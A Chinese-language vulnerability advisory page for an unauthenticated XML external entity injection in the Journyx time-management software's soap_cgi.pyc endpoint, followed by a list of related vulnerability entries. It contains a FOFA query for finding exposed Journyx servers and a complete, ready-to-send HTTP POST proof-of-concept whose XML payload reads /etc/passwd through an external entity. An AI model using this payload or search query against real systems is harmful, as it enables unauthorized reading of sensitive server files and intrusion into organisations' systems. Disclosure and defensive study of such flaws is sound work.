Journyx存在未经身份验证的XML外部实体注入

日期: 2024-08-08 | 影响软件: Journyx | POC: 已公开

漏洞描述

Journyx是一个企业时间管理软件品牌，它提供了一系列的时间管理和费用报销解决方案，旨在帮助企业更好地跟踪和管理员工的工作时间、项目成本以及可报销费用。Journyx存在未经身份验证的XML外部实体注入,未授权的攻击者可利用此漏洞读取系统内部配置文件，造成信息泄露。

PoC代码

# Journyx存在未经身份验证的XML外部实体注入



Journyx项目管理软件 soap_cgi.pyc 接口存在XML实体注入漏洞，未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件，获取敏感信息，使系统处于极不安全的状态。



## fofa



```javascript

"Journyx"

```



## poc



```javascript

POST /jtcgi/soap_cgi.pyc HTTP/1.1

Host: 

Accept: */*

Content-Type: application/x-www-form-urlencoded

Accept-Ldwk: bG91ZG9uZ3dlbmt1

User-Agent: curl/8.1.2

Content-Length: 333



<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>zzz</curpwd><newpwd>zzz123</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>

```



![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408091049662.png)

漏洞描述

PoC代码

相关漏洞推荐

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893） 无POC

CVE-2024-6892: Journyx 11.5.4 - Reflected Cross Site Scripting POC

CVE-2024-6893: Journyx - XML External Entities Injection (XXE) POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893）无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC